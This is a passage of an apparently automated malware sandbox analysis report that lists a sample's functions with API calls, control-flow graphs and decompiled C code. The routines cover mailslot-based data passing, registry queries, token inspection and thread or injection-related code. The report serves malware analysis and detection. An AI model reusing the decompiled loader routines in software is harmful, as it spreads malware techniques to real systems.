                      • CreateThread.KERNELBASE(00000000,00000000,004010FB,?,00000000,?), ref: 0040169C
                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016B3
                      • GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016C0
                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016D0
                      • GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016D9
                        • Part of subcall function 004015A3: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,752AC470,004016EC,?,?,00000000), ref: 004015C9
                      • TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016F7
                      • CloseHandle.KERNEL32(?), ref: 00401700
                      • GetLastError.KERNEL32(?,?,00000000), ref: 00401708
                      • CloseHandle.KERNEL32(?), ref: 00401714
                      • GetLastError.KERNEL32(?,00000000), ref: 0040171D
                      Memory Dump Source
                      • Source File: 00000003.00000002.1148966230.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.1148947137.00400000.00000002.sdmp Download File
                      • Associated: 00000003.00000002.1148981734.00402000.00000002.sdmp Download File
                      • Associated: 00000003.00000002.1149005296.00403000.00000004.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_text.jbxd
                      Similarity
                      • API ID: Thread$CloseCodeCreateErrorExitHandleLastObjectSingleWait$AllocTerminateVirtual
                      • String ID:
                      • API String ID: 2781294418-0
                      • Opcode ID: 8c03ab36042ed6f52e850f07250f175f27c204e4b6659917796c1b471e7c79f0
                      • Instruction ID: 87f03f665843337bf68fe172ccf2670ca8cb997910dba5155611d0e3495f720c
                      • Opcode Fuzzy Hash: 8c03ab36042ed6f52e850f07250f175f27c204e4b6659917796c1b471e7c79f0
                      • Instruction Fuzzy Hash: 2E31FC71800209FBDB11DFA5DD858EE7BBCEB49350B208137FA05F61A0D6749A44DBA8
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90sleepfileCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 216 4010fb-401104 217 401107-401124 CreateFileA 216->217 218 401126-401137 GetLastError Sleep 217->218 219 401139 217->219 220 40113c-401140 218->220 219->220 220->217 221 401142-401145 220->221 222 4011ea-4011ef 221->222 223 40114b-40115f call 40172f 221->223 226 401161-401169 223->226 227 4011da 223->227 229 40116e-401173 226->229 228 4011e1-4011e4 CloseHandle 227->228 228->222 230 401175 229->230 231 401178-401192 WriteFile 229->231 230->231 232 401194-40119c 231->232 233 4011a8-4011b4 GetLastError 231->233 235 4011b6-4011c0 Sleep 232->235 236 40119e-4011a0 232->236 234 4011c2-4011d8 memset call 401207 233->234 233->235 234->228 235->229 235->234 236->235 237 4011a2-4011a6 236->237 237->235
                      C-Code - Quality: 94%
                      			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040172F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

















                      0x004010fb
                      0x004010fb
                      0x00401104
                      0x00401107
                      0x00401118
                      0x0040111e
                      0x00401124
                      0x00401139
                      0x00401126
                      0x0040112e
                      0x00401131
                      0x00401131
                      0x0040113c
                      0x00401145
                      0x004011ea
                      0x004011ef
                      0x004011ef
                      0x00401158
                      0x0040115f
                      0x004011da
                      0x004011e1
                      0x004011e4
                      0x00000000
                      0x004011e4
                      0x00401161
                      0x00401164
                      0x00401165
                      0x00401168
                      0x0040116e
                      0x0040116e
                      0x00401173
                      0x00401175
                      0x00401175
                      0x0040118a
                      0x00401192
                      0x004011a8
                      0x004011ae
                      0x004011b4
                      0x00000000
                      0x00000000
                      0x00401194
                      0x00401194
                      0x00401197
                      0x0040119a
                      0x0040119c
                      0x004011a2
                      0x004011a3
                      0x004011a3
                      0x0040119c
                      0x004011b8
                      0x004011be
                      0x004011c8
                      0x004011d1
                      0x00000000

                      APIs
                      • CreateFileA.KERNELBASE(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
                      • GetLastError.KERNEL32 ref: 00401126
                      • Sleep.KERNEL32(00000064), ref: 00401131
                        • Part of subcall function 0040172F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401818
                      • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 0040118A
                      • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
                      • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
                      • memset.NTDLL ref: 004011C8
                        • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401599,00401599), ref: 00401213
                      • CloseHandle.KERNEL32(?), ref: 004011E4
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.1148966230.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.1148947137.00400000.00000002.sdmp Download File
                      • Associated: 00000003.00000002.1148981734.00402000.00000002.sdmp Download File
                      • Associated: 00000003.00000002.1149005296.00403000.00000004.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_text.jbxd
                      Similarity
                      • API ID: ErrorFileLastSleep$CloseCreateFreeHandleHeapWritememcpymemset
                      • String ID: \\.\mailslot\msl0
                      • API String ID: 990326202-622273203
                      • Opcode ID: 4bdae630b9fcbe0f8a23b9428ee12f3568433213e803cd86aea26540267a1728
                      • Instruction ID: 3a6e4c3a0fa27cd688e5fef70a244e9f952e20069a63f9e9082676df5e7f771b
                      • Opcode Fuzzy Hash: 4bdae630b9fcbe0f8a23b9428ee12f3568433213e803cd86aea26540267a1728
                      • Instruction Fuzzy Hash: 47314D75E00218ABDB15DFA5DD88A9EBBB8AF08354F104077F601BA2E0D7749A40CB59
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00401034, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72memorysleepfileCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 293 401034-40105a CreateMailslotA 294 4010d6-4010df GetLastError 293->294 295 40105c-401066 call 4011f2 293->295 296 4010e2-4010e6 294->296 301 4010c4 295->301 302 401068-40107e ReadFile 295->302 298 4010f1-4010f8 296->298 299 4010e8-4010ee 296->299 299->298 305 4010cb-4010d4 CloseHandle 301->305 303 401080-40109c RtlReAllocateHeap 302->303 304 4010a4-4010b0 GetLastError 302->304 303->301 307 40109e-4010a2 303->307 304->305 306 4010b2 304->306 305->296 308 4010b5-4010c0 Sleep 306->308 307->308 308->302 309 4010c2 308->309 309->305
                      C-Code - Quality: 100%
                      			E00401034(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t35;
				long _t36;

				_t36 = 0;
				_v12 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v20 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t35 = _a4;
					_v8 = _t25;
				} else {
					_t35 = E004011F2(0x1000);
					if(_t35 == 0) {
						L9:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t35 + _t36, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L7;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t36 = _t36 + _v16;
								_t34 = RtlReAllocateHeap( *0x40305c, 0, _t35, _v12); // executed
								_t35 = _t34;
								if(_t35 == 0) {
									goto L9;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L7;
								}
							}
							goto L10;
							L7:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L10:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t35;
					 *((intOrPtr*)(_t27 + 8)) = _t36;
				}
				return _v8;
			}















                      0x0040103d
                      0x0040104c
                      0x0040104f
                      0x00401055
                      0x0040105a
                      0x004010d6
                      0x004010dc
                      0x004010df
                      0x0040105c
                      0x00401062
                      0x00401066
                      0x004010c4
                      0x004010c4
                      0x00401068
                      0x00401068
                      0x00401076
                      0x0040107e
                      0x004010a4
                      0x004010aa
                      0x004010b0
                      0x004010b2
                      0x00000000
                      0x004010b2
                      0x00401080
                      0x00401080
                      0x00401086
                      0x00401092
                      0x00401098
                      0x0040109c
                      0x00000000
                      0x0040109e
                      0x0040109e
                      0x00000000
                      0x0040109e
                      0x0040109c
                      0x00000000
                      0x004010b5
                      0x004010b7
                      0x004010bd
                      0x004010c2
                      0x004010cb
                      0x004010ce
                      0x004010ce
                      0x004010e6
                      0x004010e8
                      0x004010eb
                      0x004010ee
                      0x004010ee
                      0x004010f8

                      APIs
                      • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
                      • GetLastError.KERNEL32 ref: 004010D6
                        • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401553,00000208,00000000,?,0040160D,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
                      • ReadFile.KERNELBASE(?,?,00001000,?,00000000), ref: 00401076
                      • RtlReAllocateHeap.NTDLL(00000000,00000000,?), ref: 00401092
                      • GetLastError.KERNEL32 ref: 004010A4
                      • Sleep.KERNELBASE(00000064), ref: 004010B7
                      • CloseHandle.KERNEL32(?), ref: 004010CE
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.1148966230.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.1148947137.00400000.00000002.sdmp Download File
                      • Associated: 00000003.00000002.1148981734.00402000.00000002.sdmp Download File
                      • Associated: 00000003.00000002.1149005296.00403000.00000004.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_text.jbxd
                      Similarity
                      • API ID: AllocateErrorHeapLast$CloseCreateFileHandleMailslotReadSleep
                      • String ID: \\.\mailslot\msl0
                      • API String ID: 3691270289-622273203
                      • Opcode ID: bb05a7b30b9f04e70e584028e2bcf9ee6f571bc0d10fb0b264c7aa77a4cc3123
                      • Instruction ID: d23dc2a85cadddd41d6abb100f9dc413ece9bb957419d815b73429d736441217
                      • Opcode Fuzzy Hash: bb05a7b30b9f04e70e584028e2bcf9ee6f571bc0d10fb0b264c7aa77a4cc3123
                      • Instruction Fuzzy Hash: 9D214A70D01358EBDB109F95CE88A9EBBB8FB44351F108076E641B22A0D7B48A84DA58
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 01411227, Relevance: 13.6, APIs: 9, Instructions: 78registrymemorystringCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 310 1411227-1411258 PathFindFileNameW lstrcmpiW 311 141130f 310->311 312 141125e-1411264 310->312 313 1411312-1411319 311->313 314 1411266 312->314 315 141126b-1411289 RegOpenKeyExA 312->315 314->315 315->313 316 141128f-14112b7 lstrlenW RtlAllocateHeap 315->316 317 1411304-141130d RegCloseKey 316->317 318 14112b9-14112d4 RegQueryValueExW 316->318 317->313 319 14112f6-14112fe HeapFree 318->319 320 14112d6-14112f1 StrStrIW 318->320 319->317 320->319 321 14112f3 320->321 321->319
                      APIs
                      • PathFindFileNameW.SHLWAPI(0141618C), ref: 01411249
                      • lstrcmpiW.KERNELBASE(00000000,?,01417614), ref: 01411250
                      • RegOpenKeyExA.KERNEL32(80000001,01418080,00000000,00000000,?,?,01417614), ref: 01411281
                      • lstrlenW.KERNEL32(?,01417614), ref: 01411295
                      • RtlAllocateHeap.NTDLL(00000000,?), ref: 014112AD
                      • RegQueryValueExW.KERNEL32(?,00000000,01417614,00000000,01417614,?,01417614), ref: 014112CC
                      • StrStrIW.SHLWAPI(00000000), ref: 014112E9
                      • HeapFree.KERNEL32(00000000,00000000), ref: 014112FE
                      • RegCloseKey.ADVAPI32(?,?,01417614), ref: 01411307
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: Heap$AllocateCloseFileFindFreeNameOpenPathQueryValuelstrcmpilstrlen
                      • String ID:
                      • API String ID: 2182914722-0
                      • Opcode ID: 2615739f57e1c7dd366f42f7b62813eef064ab7a2dab6edf1fdb85b0734d3672
                      • Instruction ID: 447544d0db6d1a43a516fc81799659135e733b00f809b3ae3278da579e56540d
                      • Opcode Fuzzy Hash: 2615739f57e1c7dd366f42f7b62813eef064ab7a2dab6edf1fdb85b0734d3672
                      • Instruction Fuzzy Hash: 70214FB1900118ABDB319FB9ED48DAF7FB8FF44751B014169FA09E2139D7718900DB60
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0141144F, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45librarythreadCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 322 141144f-1411466 LoadLibraryA 323 14114b4-14114b9 322->323 324 1411468-141147c 322->324 326 14114b2-14114b3 324->326 327 141147e-1411491 GetModuleHandleA 324->327 326->323 327->326 329 1411493-141149e FindWindowA 327->329 329->326 330 14114a0-14114a9 GetWindowThreadProcessId 329->330 330->326 331 14114ab 330->331 331->326
                      APIs
                      • LoadLibraryA.KERNEL32(USER32.DLL), ref: 0141145E
                      • GetModuleHandleA.KERNEL32(USER32.DLL,01418000,?,?,0141178B,00000000,?,01417614), ref: 01411484
                      • FindWindowA.USER32(01418640,00000000,?,?,0141178B,00000000,?,01417614), ref: 0141149A
                      • GetWindowThreadProcessId.USER32(00000000,00000000,?,?,0141178B,00000000,?,01417614), ref: 014114A5
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: Window$FindHandleLibraryLoadModuleProcessThread
                      • String ID: USER32.DLL$pnls$pnls
                      • API String ID: 108827374-1300720345
                      • Opcode ID: 2103aea1732094da0d14978e3bb98340fb0d1ba6ef537523181818fc2bbeb894
                      • Instruction ID: 0ffd90f4e35c2118bde5c53d06c020b43ad4d2d05c0e7164593883a5f90cb31d
                      • Opcode Fuzzy Hash: 2103aea1732094da0d14978e3bb98340fb0d1ba6ef537523181818fc2bbeb894
                      • Instruction Fuzzy Hash: CDF0C8B1A40716B7EB3087F98C45F6F7ABC9B04D50B25412BAB01E3168DBB8ED00466C
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 01414365, Relevance: 10.6, APIs: 4, Strings: 3, Instructions: 105memorystringCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 332 1414365-14143a6 lstrcpyn 333 14143aa-14143af 332->333 334 14143b1-14143b7 333->334 335 14143bb-14143bf 333->335 334->335 338 14143b9 334->338 336 14143c1-14143c3 335->336 337 14143c5-14143c7 335->337 336->333 336->337 339 1414482 337->339 340 14143cd-14143d2 337->340 338->335 343 1414489-1414490 339->343 341 1414479-1414480 340->341 342 14143d8-14143dc 340->342 341->343 342->341 344 14143e2-1414410 VirtualAlloc 342->344 345 1414470-1414477 344->345 346 1414412-1414446 call 1414b60 344->346 345->343 349 1414459 346->349 350 1414448-1414457 memcpy 346->350 351 1414460-141446e VirtualFree 349->351 350->351 351->343
                      APIs
                      • lstrcpyn.KERNEL32(014116FE,014161F4,00000008,0141618C,0000000C,00000000,?,?,?,014116FE,?,?,01417614), ref: 01414393
                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,014116FE,?,?,01417614), ref: 01414406
                      • memcpy.NTDLL(?,00000000,?,?,01417614,00000001,?,?,?,014116FE,?,?,01417614), ref: 0141444F
                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,01417614,00000001,?,?,?,014116FE,?), ref: 01414468
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: Virtual$AllocFreelstrcpynmemcpy
                      • String ID: Feb 28 2019$pnls$pnls
                      • API String ID: 2133416149-3706025122
                      • Opcode ID: 0c9b5da5f0e00675f502cb655fad11273fb5ddede5de0edad8976e6b699494d9
                      • Instruction ID: 1c15b49dd5952824ab879ea8a7b6c64d44dbd2e47bced3908488e2d70e992cf2
                      • Opcode Fuzzy Hash: 0c9b5da5f0e00675f502cb655fad11273fb5ddede5de0edad8976e6b699494d9
                      • Instruction Fuzzy Hash: 3631B275A402159BDF14CF98C884BAFBBB5FF44714F19805ADA01AB36AC7B0E545CB90
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 01413E06, Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                      • OpenProcessToken.ADVAPI32(000000FF,00020008,01417614,00000000), ref: 01413E38
                      • GetTokenInformation.KERNELBASE(01417614,00000014,00000001,00000004,?,00000000), ref: 01413E58
                      • GetTokenInformation.KERNELBASE(01417614,00000019,00000000,00000000,?), ref: 01413E68
                      • CloseHandle.KERNEL32(01417614), ref: 01413EB8
                        • Part of subcall function 0141115F: RtlAllocateHeap.NTDLL(00000000,?,01413BA9), ref: 0141116B
                      • GetTokenInformation.KERNELBASE(01417614,00000019,00000000,?,?,?,0141618C), ref: 01413E8B
                      • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 01413E93
                      • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 01413EA3
                        • Part of subcall function 01411174: HeapFree.KERNEL32(00000000,?,01413C0E), ref: 01411180
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: Token$Information$AuthorityHeap$AllocateCloseCountFreeHandleOpenProcess
                      • String ID:
                      • API String ID: 1097422675-0
                      • Opcode ID: 277b92339f37649408ddb98e946438f65151c558f4b5935c2a96f656c57d8d34
                      • Instruction ID: 53997217784cedd03e21994b30bebe3f09bc653eaaa94c5a9e1b67890d364957
                      • Opcode Fuzzy Hash: 277b92339f37649408ddb98e946438f65151c558f4b5935c2a96f656c57d8d34
                      • Instruction Fuzzy Hash: E3213CB5900209FFEB11DFA4DC44EAEBFB9FB48314F0000A6EA11A6265C7719A04EF60
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 01411096, Relevance: 10.6, APIs: 7, Instructions: 67memorythreadCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 366 1411096-14110a5 367 1411107-1411114 InterlockedDecrement 366->367 368 14110a7-14110a8 366->368 369 1411157-141115c 367->369 371 1411116-141111c 367->371 368->369 370 14110ae-14110bb InterlockedIncrement 368->370 370->369 372 14110c1-14110d5 HeapCreate 370->372 373 141114b-1411151 HeapDestroy 371->373 374 141111e-141111f 371->374 375 1411103-1411105 372->375 376 14110d7-1411101 call 1411000 CreateThread 372->376 373->369 377 1411124-1411135 SleepEx 374->377 375->369 376->369 376->375 379 1411137-141113c 377->379 380 141113e-141114a CloseHandle 377->380 379->377 379->380 380->373
                      APIs
                      • InterlockedIncrement.KERNEL32(014175C8), ref: 014110B3
                      • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 014110C8
                        • Part of subcall function 01411000: memcpy.NTDLL(014176E0,?,0000000C,01416240,0000000C,014110EC,?,00000000,?), ref: 0141103B
                      • CreateThread.KERNELBASE(00000000,00000000,Function_0000005E,00000000,?,00000000), ref: 014110F4
                      • InterlockedDecrement.KERNEL32(014175C8), ref: 0141110C
                      • SleepEx.KERNEL32(00000064,00000001), ref: 01411128
                      • CloseHandle.KERNEL32 ref: 01411144
                      • HeapDestroy.KERNEL32 ref: 01411151
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: CreateHeapInterlocked$CloseDecrementDestroyHandleIncrementSleepThreadmemcpy
                      • String ID:
                      • API String ID: 820571241-0
                      • Opcode ID: fca41bc9b628efff89ca9da96281f401bafb523817cb9c0bb511dcfa355902c6
                      • Instruction ID: 2992ad1b0e43e0ead2cf6d0d02c43db8c74542208ee49da562079a1d50f45c2d
                      • Opcode Fuzzy Hash: fca41bc9b628efff89ca9da96281f401bafb523817cb9c0bb511dcfa355902c6
                      • Instruction Fuzzy Hash: D3116075601254AFDB319F39EC48A5BBFA9FB0AEA1B114026F70AC163CC7B194008B50
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64memorysleepfileCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 382 401033-40105a CreateMailslotA 384 4010d6-4010df GetLastError 382->384 385 40105c-401066 call 4011f2 382->385 386 4010e2-4010e6 384->386 391 4010c4 385->391 392 401068-40107e ReadFile 385->392 388 4010f1-4010f8 386->388 389 4010e8-4010ee 386->389 389->388 395 4010cb-4010d4 CloseHandle 391->395 393 401080-40109c RtlReAllocateHeap 392->393 394 4010a4-4010b0 GetLastError 392->394 393->391 397 40109e-4010a2 393->397 394->395 396 4010b2 394->396 395->386 398 4010b5-4010c0 Sleep 396->398 397->398 398->392 399 4010c2 398->399 399->395
                      C-Code - Quality: 96%
                      			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = RtlReAllocateHeap( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}















                      0x00401033
                      0x0040103d
                      0x0040104c
                      0x0040104f
                      0x00401055
                      0x0040105a
                      0x004010d6
                      0x004010dc
                      0x004010df
                      0x0040105c
                      0x00401062
                      0x00401066
                      0x004010c4
                      0x004010c4
                      0x00401068
                      0x00401068
                      0x00401076
                      0x0040107e
                      0x004010a4
                      0x004010aa
                      0x004010b0
                      0x004010b2
                      0x00000000
                      0x004010b2
                      0x00401080
                      0x00401080
                      0x00401086
                      0x00401092
                      0x00401098
                      0x0040109c
                      0x00000000
                      0x0040109e
                      0x0040109e
                      0x00000000
                      0x0040109e
                      0x0040109c
                      0x00000000
                      0x004010b5
                      0x004010b7
                      0x004010bd
                      0x004010c2
                      0x004010cb
                      0x004010ce
                      0x004010ce
                      0x004010e6
                      0x004010e8
                      0x004010eb
                      0x004010ee
                      0x004010ee
                      0x004010f8

                      APIs
                      • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
                      • GetLastError.KERNEL32 ref: 004010D6
                        • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401553,00000208,00000000,?,0040160D,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
                      • ReadFile.KERNELBASE(?,?,00001000,?,00000000), ref: 00401076
                      • RtlReAllocateHeap.NTDLL(00000000,00000000,?), ref: 00401092
                      • GetLastError.KERNEL32 ref: 004010A4
                      • Sleep.KERNELBASE(00000064), ref: 004010B7
                      • CloseHandle.KERNEL32(?), ref: 004010CE
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.1148966230.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.1148947137.00400000.00000002.sdmp Download File
                      • Associated: 00000003.00000002.1148981734.00402000.00000002.sdmp Download File
                      • Associated: 00000003.00000002.1149005296.00403000.00000004.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_text.jbxd
                      Similarity
                      • API ID: AllocateErrorHeapLast$CloseCreateFileHandleMailslotReadSleep
                      • String ID: \\.\mailslot\msl0
                      • API String ID: 3691270289-622273203
                      • Opcode ID: d83491b128b874970635f2c91288b0718e6b26e4eb36ae321374187c494f20b3
                      • Instruction ID: 301bfff34d3d9a42d24819e7bb6be00bc8a8a456f07860fe6218443ba64bb720
                      • Opcode Fuzzy Hash: d83491b128b874970635f2c91288b0718e6b26e4eb36ae321374187c494f20b3
                      • Instruction Fuzzy Hash: D3116A31901358ABDB219F95CD88BAFBBB8FB44750F108077F640B21E0D7B48980CA68
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 014115FB, Relevance: 10.6, APIs: 7, Instructions: 62fileCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 400 14115fb-141161c CreateFileW 401 141167b-1411681 GetLastError 400->401 402 141161e-1411637 CreateFileMappingW 400->402 405 1411683-1411687 401->405 403 1411639-1411647 MapViewOfFile 402->403 404 141166c-1411672 GetLastError 402->404 406 1411649-141165d GetFileSize 403->406 407 141165f-1411665 GetLastError 403->407 408 1411674-1411679 404->408 409 1411667-141166a 406->409 407->409 408->405 409->408
                      APIs
                      • CreateFileW.KERNELBASE(0141763C,80000000,00000001,00000000,00000003,00000000,00000000), ref: 01411611
                      • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,01417614), ref: 01411627
                      • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,01417614), ref: 0141163F
                      • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,01417614), ref: 01411651
                      • GetLastError.KERNEL32(?,00000000,?,01417614), ref: 0141165F
                      • GetLastError.KERNEL32(?,00000000,?,01417614), ref: 0141166C
                      • GetLastError.KERNEL32(?,01417614), ref: 0141167B
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: File$ErrorLast$Create$MappingSizeView
                      • String ID:
                      • API String ID: 2408169653-0
                      • Opcode ID: ab2bceceaa55479acf8b6edb4093f3c7ae4f7b24588e43e182be8b63ac91f9b7
                      • Instruction ID: e5a608559401c5aea47ddef825109968de701d14c89a0daa7b3ff9979d0a7aab
                      • Opcode Fuzzy Hash: ab2bceceaa55479acf8b6edb4093f3c7ae4f7b24588e43e182be8b63ac91f9b7
                      • Instruction Fuzzy Hash: 890125B1502220BBD2309B759C4CE6B7F7DDF47AB1F160915FA0E92268D5718845C7B0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0141225F, Relevance: 9.1, APIs: 6, Instructions: 105threadsynchronizationinjectionCOMMON
                      Download Yara Rule
                      APIs
